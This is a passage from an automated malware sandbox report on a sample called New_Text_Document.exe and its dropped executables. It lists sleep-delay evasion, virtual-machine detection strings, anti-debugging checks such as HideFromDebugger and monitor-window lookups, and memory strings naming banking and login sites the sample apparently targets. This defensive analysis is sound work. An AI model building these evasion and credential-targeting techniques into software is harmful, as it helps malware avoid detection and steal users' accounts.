                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596013Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595904Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595356Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595138Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594786Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594619Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594044Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593401Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593290Jump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeThread delayed: delay time: 35529Jump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: explorer.exe, 0000000C.00000002.2476885450.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: svchost.exe, 00000004.00000002.1451459812.0000025484C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: svchost.exe, 00000004.00000002.1455127778.000002548A251000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000012.00000002.2486004856.00000182E2864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: svchost.exe, 00000012.00000002.2487391705.00000182E2902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                    Source: svchost.exe, 00000012.00000002.2485247002.00000182E284B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:ideos>
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: svchost.exe, 00000012.00000002.2484409642.00000182E282B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: explorer.exe, 0000000C.00000002.2476885450.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: setup.exe, 00000013.00000002.1457326190.000001947E7F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                    Source: svchost.exe, 00000012.00000002.2483881924.00000182E2813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                    Source: New_Text_Document.exe, 00000000.00000002.2475118893.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000012.00000002.2485247002.00000182E284B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                    Source: explorer.exe, 0000000C.00000002.2493642182.000000000324A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                    Source: svchost.exe, 00000012.00000002.2482776333.00000182E2802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: svchost.exe, 00000012.00000002.2485247002.00000182E284B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 0000000C.00000002.2476885450.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: raserver.exe, 00000014.00000003.1557579600.0000000007C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: C:\Users\user\Desktop\a\sbinzx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\a\setup.exeSystem information queried: ModuleInformation
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\Desktop\a\setup.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\Desktop\a\setup.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01290124 mov eax, dword ptr fs:[00000030h]8_2_01290124
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01320115 mov eax, dword ptr fs:[00000030h]8_2_01320115
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130A118 mov ecx, dword ptr fs:[00000030h]8_2_0130A118
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130A118 mov eax, dword ptr fs:[00000030h]8_2_0130A118
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130A118 mov eax, dword ptr fs:[00000030h]8_2_0130A118
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130A118 mov eax, dword ptr fs:[00000030h]8_2_0130A118
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov ecx, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov ecx, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov ecx, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov eax, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130E10E mov ecx, dword ptr fs:[00000030h]8_2_0130E10E
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334164 mov eax, dword ptr fs:[00000030h]8_2_01334164
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01334164 mov eax, dword ptr fs:[00000030h]8_2_01334164
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F4144 mov eax, dword ptr fs:[00000030h]8_2_012F4144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F4144 mov eax, dword ptr fs:[00000030h]8_2_012F4144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F4144 mov ecx, dword ptr fs:[00000030h]8_2_012F4144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F4144 mov eax, dword ptr fs:[00000030h]8_2_012F4144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F4144 mov eax, dword ptr fs:[00000030h]8_2_012F4144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266154 mov eax, dword ptr fs:[00000030h]8_2_01266154
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01266154 mov eax, dword ptr fs:[00000030h]8_2_01266154
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125C156 mov eax, dword ptr fs:[00000030h]8_2_0125C156
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F8158 mov eax, dword ptr fs:[00000030h]8_2_012F8158
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A0185 mov eax, dword ptr fs:[00000030h]8_2_012A0185
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01304180 mov eax, dword ptr fs:[00000030h]8_2_01304180
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01304180 mov eax, dword ptr fs:[00000030h]8_2_01304180
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E019F mov eax, dword ptr fs:[00000030h]8_2_012E019F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E019F mov eax, dword ptr fs:[00000030h]8_2_012E019F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E019F mov eax, dword ptr fs:[00000030h]8_2_012E019F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E019F mov eax, dword ptr fs:[00000030h]8_2_012E019F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A197 mov eax, dword ptr fs:[00000030h]8_2_0125A197
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A197 mov eax, dword ptr fs:[00000030h]8_2_0125A197
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A197 mov eax, dword ptr fs:[00000030h]8_2_0125A197
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131C188 mov eax, dword ptr fs:[00000030h]8_2_0131C188
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131C188 mov eax, dword ptr fs:[00000030h]8_2_0131C188
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012901F8 mov eax, dword ptr fs:[00000030h]8_2_012901F8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013361E5 mov eax, dword ptr fs:[00000030h]8_2_013361E5
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013261C3 mov eax, dword ptr fs:[00000030h]8_2_013261C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013261C3 mov eax, dword ptr fs:[00000030h]8_2_013261C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE1D0 mov eax, dword ptr fs:[00000030h]8_2_012DE1D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE1D0 mov eax, dword ptr fs:[00000030h]8_2_012DE1D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE1D0 mov ecx, dword ptr fs:[00000030h]8_2_012DE1D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE1D0 mov eax, dword ptr fs:[00000030h]8_2_012DE1D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DE1D0 mov eax, dword ptr fs:[00000030h]8_2_012DE1D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A020 mov eax, dword ptr fs:[00000030h]8_2_0125A020
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125C020 mov eax, dword ptr fs:[00000030h]8_2_0125C020
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F6030 mov eax, dword ptr fs:[00000030h]8_2_012F6030
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E4000 mov ecx, dword ptr fs:[00000030h]8_2_012E4000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01302000 mov eax, dword ptr fs:[00000030h]8_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E016 mov eax, dword ptr fs:[00000030h]8_2_0127E016
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E016 mov eax, dword ptr fs:[00000030h]8_2_0127E016
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E016 mov eax, dword ptr fs:[00000030h]8_2_0127E016
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E016 mov eax, dword ptr fs:[00000030h]8_2_0127E016
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128C073 mov eax, dword ptr fs:[00000030h]8_2_0128C073
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01262050 mov eax, dword ptr fs:[00000030h]8_2_01262050
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E6050 mov eax, dword ptr fs:[00000030h]8_2_012E6050
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012580A0 mov eax, dword ptr fs:[00000030h]8_2_012580A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F80A8 mov eax, dword ptr fs:[00000030h]8_2_012F80A8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013260B8 mov eax, dword ptr fs:[00000030h]8_2_013260B8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013260B8 mov ecx, dword ptr fs:[00000030h]8_2_013260B8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126208A mov eax, dword ptr fs:[00000030h]8_2_0126208A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0125A0E3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E60E0 mov eax, dword ptr fs:[00000030h]8_2_012E60E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012680E9 mov eax, dword ptr fs:[00000030h]8_2_012680E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125C0F0 mov eax, dword ptr fs:[00000030h]8_2_0125C0F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A20F0 mov ecx, dword ptr fs:[00000030h]8_2_012A20F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E20DE mov eax, dword ptr fs:[00000030h]8_2_012E20DE
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01338324 mov eax, dword ptr fs:[00000030h]8_2_01338324
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01338324 mov ecx, dword ptr fs:[00000030h]8_2_01338324
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01338324 mov eax, dword ptr fs:[00000030h]8_2_01338324
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01338324 mov eax, dword ptr fs:[00000030h]8_2_01338324
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A30B mov eax, dword ptr fs:[00000030h]8_2_0129A30B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A30B mov eax, dword ptr fs:[00000030h]8_2_0129A30B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129A30B mov eax, dword ptr fs:[00000030h]8_2_0129A30B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125C310 mov ecx, dword ptr fs:[00000030h]8_2_0125C310
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01280310 mov ecx, dword ptr fs:[00000030h]8_2_01280310
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130437C mov eax, dword ptr fs:[00000030h]8_2_0130437C
